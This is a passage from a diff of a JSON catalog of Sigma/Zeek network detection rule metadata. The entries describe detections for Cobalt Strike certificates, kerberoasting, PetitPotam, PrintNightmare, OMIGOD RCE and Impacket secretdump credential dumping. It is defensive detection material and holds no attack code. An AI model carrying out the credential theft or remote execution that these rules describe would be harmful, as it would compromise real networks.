"https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.s0154" + ] + }, + "uuid": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", + "value": "Default Cobalt Strike Certificate" + }, + { + "description": "Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service.", + "meta": { + "author": "Josh Brower @DefensiveDepth", + "creation_date": "2020/08/22", + "falsepositive": [ + "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." + ], + "filename": "zeek_rdp_public_listener.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://attack.mitre.org/techniques/T1021/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" + ], + "tags": [ + "attack.t1021.001" + ] + }, + "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", + "value": "Publicly Accessible RDP Service" + }, + { + "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", + "meta": { + "author": "sigma", + "creation_date": "2020/02/12", + "falsepositive": [ + "Normal enterprise SPN requests activity" + ], + "filename": "zeek_susp_kerberos_rc4.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://adsecurity.org/?p=3458", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", + "value": "Kerberos Network Traffic RC4 Ticket Encryption" + }, + { + "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\n", + "meta": { + "author": "@neu5ron, @Antonlovesdnb, Mike Remen", + "creation_date": "2021/08/17", + "falsepositive": [ + "Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." + ], + "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", + "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://threatpost.com/microsoft-petitpotam-poc/168163/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" + ], + "tags": [ + "attack.t1557.001", + "attack.t1187" + ] + }, + "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", + "value": "Potential PetitPotam Attack Via EFS RPC Calls" + }, + { + "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_http_webdav_put_request.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", + "value": "WebDav Put Request" + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "meta": { + "author": "Samir Bousseaden, @neu5rn", + "creation_date": "2020/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_smb_converted_win_atsvc_task.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ] + }, + "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", + "value": "Remote Task Creation via ATSVC Named Pipe - Zeek" + }, + { + "description": "Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", + "meta": { + "author": "SOC Prime, Adam Swan", + "creation_date": "2020/05/01", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_http_executable_download_from_webdav.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29", - "https://github.com/OTRF/detection-hackathon-apt29/issues/37", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" + "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" ], "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1082" + "attack.command_and_control", + "attack.t1105" ] }, - "uuid": "66a0bdc6-ee04-441a-9125-99d2eb547942", - "value": "Domain User Enumeration Network Recon 01" + "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", + "value": "Executable from Webdav" + }, + { + "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", + "meta": { + "author": "Saw Winn Naung , Azure-Sentinel", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_dns_torproxy.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" + ], + "tags": [ + "attack.t1048" + ] + }, + "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", + "value": "DNS TOR Proxies" + }, + { + "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", + "meta": { + "author": "Nate Guagenti (neu5ron)", + "creation_date": "2021/09/20", + "falsepositive": [ + "Exploits that were attempted but unsuccessful.", + "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." + ], + "filename": "zeek_http_omigod_no_auth_rce.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://twitter.com/neu5ron/status/1438987292971053057?s=20", + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.lateral_movement", + "attack.t1068", + "attack.t1190", + "attack.t1203", + "attack.t1021.006", + "attack.t1210" + ] + }, + "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", + "value": "OMIGOD HTTP No Authentication RCE" }, { "description": "Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", @@ -10387,372 +1020,6 @@ "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", "value": "MITRE BZAR Indicators for Execution" }, - { - "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", - "meta": { - "author": "@neu5ron, SOC Prime", - "creation_date": "2020/03/19", - "falsepositive": [ - "Windows administrator tasks or troubleshooting", - "Windows management scripts or software" - ], - "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.004" - ] - }, - "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", - "value": "MITRE BZAR Indicators for Persistence" - }, - { - "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\n", - "meta": { - "author": "@neu5ron, @Antonlovesdnb, Mike Remen", - "creation_date": "2021/08/17", - "falsepositive": [ - "Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." - ], - "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", - "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", - "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", - "https://threatpost.com/microsoft-petitpotam-poc/168163/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" - ], - "tags": [ - "attack.t1557.001", - "attack.t1187" - ] - }, - "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", - "value": "Potential PetitPotam Attack Via EFS RPC Calls" - }, - { - "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", - "meta": { - "author": "@neu5ron (Nate Guagenti)", - "creation_date": "2021/08/23", - "falsepositive": [ - "Legitimate remote alteration of a printer driver." - ], - "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", - "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://github.com/corelight/CVE-2021-1675", - "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", - "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" - ], - "tags": [ - "attack.execution", - "cve.2021.1678", - "cve.2021.1675", - "cve.2021.34527" - ] - }, - "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", - "value": "Possible PrintNightmare Print Driver Install" - }, - { - "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "meta": { - "author": "OTR (Open Threat Research), @neu5ron", - "creation_date": "2018/11/28", - "falsepositive": [ - "Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too" - ], - "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", - "https://twitter.com/_dirkjan/status/1309214379003588608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", - "value": "SMB Spoolss Name Piped Usage" - }, - { - "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/06/23", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_default_cobalt_strike_certificate.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.s0154" - ] - }, - "uuid": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", - "value": "Default Cobalt Strike Certificate" - }, - { - "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", - "meta": { - "author": "Saw Winn Naung, Azure-Sentinel, @neu5ron", - "creation_date": "2021/08/19", - "falsepositive": [ - "A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'." - ], - "filename": "zeek_dns_mining_pools.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" - ], - "tags": [ - "attack.t1569.002", - "attack.t1496" - ] - }, - "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", - "value": "DNS Events Related To Mining Pools" - }, - { - "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>", - "meta": { - "author": "Michael Portera (@mportatoes)", - "creation_date": "2022/04/21", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_dns_nkn.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/nknorg/nkn-sdk-go", - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", - "https://github.com/Maka8ka/NGLite", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" - ], - "tags": [ - "attack.command_and_control" - ] - }, - "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", - "value": "New Kind of Network (NKN) Detection" - }, - { - "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", - "meta": { - "author": "@neu5ron, SOC Prime Team, Corelight", - "creation_date": "2021/05/04", - "falsepositive": [ - "Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.", - "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" - ], - "filename": "zeek_dns_susp_zbit_flag.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://twitter.com/neu5ron/status/1346245602502443009", - "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", - "https://tools.ietf.org/html/rfc2929#section-2.1", - "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" - ], - "tags": [ - "attack.t1095", - "attack.t1571", - "attack.command_and_control" - ] - }, - "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", - "value": "Suspicious DNS Z Flag Bit Set" - }, - { - "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", - "meta": { - "author": "Saw Winn Naung , Azure-Sentinel", - "creation_date": "2021/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_dns_torproxy.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" - ], - "tags": [ - "attack.t1048" - ] - }, - "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", - "value": "DNS TOR Proxies" - }, - { - "description": "Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", - "meta": { - "author": "SOC Prime, Adam Swan", - "creation_date": "2020/05/01", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_http_executable_download_from_webdav.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", - "https://github.com/OTRF/detection-hackathon-apt29", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", - "value": "Executable from Webdav" - }, - { - "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", - "meta": { - "author": "Nate Guagenti (neu5ron)", - "creation_date": "2021/09/20", - "falsepositive": [ - "Exploits that were attempted but unsuccessful.", - "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." - ], - "filename": "zeek_http_omigod_no_auth_rce.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://twitter.com/neu5ron/status/1438987292971053057?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.lateral_movement", - "attack.t1068", - "attack.t1190", - "attack.t1203", - "attack.t1021.006", - "attack.t1210" - ] - }, - "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", - "value": "OMIGOD HTTP No Authentication RCE" - }, - { - "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_http_webdav_put_request.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/17", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", - "value": "WebDav Put Request" - }, - { - "description": "Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service.", - "meta": { - "author": "Josh Brower @DefensiveDepth", - "creation_date": "2020/08/22", - "falsepositive": [ - "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." - ], - "filename": "zeek_rdp_public_listener.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://attack.mitre.org/techniques/T1021/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" - ], - "tags": [ - "attack.t1021.001" - ] - }, - "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", - "value": "Publicly Accessible RDP Service" - }, - { - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "meta": { - "author": "Samir Bousseaden, @neu5rn", - "creation_date": "2020/04/03", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_smb_converted_win_atsvc_task.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_atsvc_task.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" - ] - }, - "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", - "value": "Remote Task Creation via ATSVC Named Pipe - Zeek" - }, { "description": "Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", "meta": { @@ -10779,30 +1046,6 @@ "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", "value": "Possible Impacket SecretDump Remote Activity - Zeek" }, - { - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "meta": { - "author": "Samir Bousseaden, @neu5ron, Tim Shelton", - "creation_date": "2020/04/02", - "falsepositive": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" - ], - "filename": "zeek_smb_converted_win_lm_namedpipe.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_lm_namedpipe.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "021310d9-30a6-480a-84b7-eaa69aeb92bb", - "value": "First Time Seen Remote Named Pipe - Zeek" - }, { "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", "meta": { @@ -10816,7 +1059,7 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_psexec.yml", + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" ], "tags": [ @@ -10827,6 +1070,164 @@ "uuid": "f1b3a22a-45e6-4004-afb5-4291f9c21166", "value": "Suspicious PsExec Execution - Zeek" }, + { + "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>", + "meta": { + "author": "Michael Portera (@mportatoes)", + "creation_date": "2022/04/21", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_dns_nkn.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/nknorg/nkn-sdk-go", + "https://github.com/Maka8ka/NGLite", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", + "value": "New Kind of Network (NKN) Detection" + }, + { + "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", + "meta": { + "author": "@neu5ron, SOC Prime", + "creation_date": "2020/03/19", + "falsepositive": [ + "Windows administrator tasks or troubleshooting", + "Windows management scripts or software" + ], + "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", + "value": "MITRE BZAR Indicators for Persistence" + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "meta": { + "author": "OTR (Open Threat Research), @neu5ron", + "creation_date": "2018/11/28", + "falsepositive": [ + "Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too" + ], + "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", + "value": "SMB Spoolss Name Piped Usage" + }, + { + "description": "Domain user and group enumeration via network reconnaissance.\nSeen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\nThe rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\n", + "meta": { + "author": "Nate Guagenti (@neu5ron), Open Threat Research (OTR)", + "creation_date": "2020/05/03", + "falsepositive": [ + "Devices that may do authentication like a VPN or a firewall that looksup IPs to username", + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "zeek_dce_rpc_domain_user_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/37", + "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1082" + ] + }, + "uuid": "66a0bdc6-ee04-441a-9125-99d2eb547942", + "value": "Domain User Enumeration Network Recon 01" + }, + { + "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", + "meta": { + "author": "Saw Winn Naung, Azure-Sentinel, @neu5ron", + "creation_date": "2021/08/19", + "falsepositive": [ + "A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'." + ], + "filename": "zeek_dns_mining_pools.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" + ], + "tags": [ + "attack.t1569.002", + "attack.t1496" + ] + }, + "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", + "value": "DNS Events Related To Mining Pools" + }, + { + "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", + "meta": { + "author": "@neu5ron (Nate Guagenti)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Legitimate remote alteration of a printer driver." + ], + "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", + 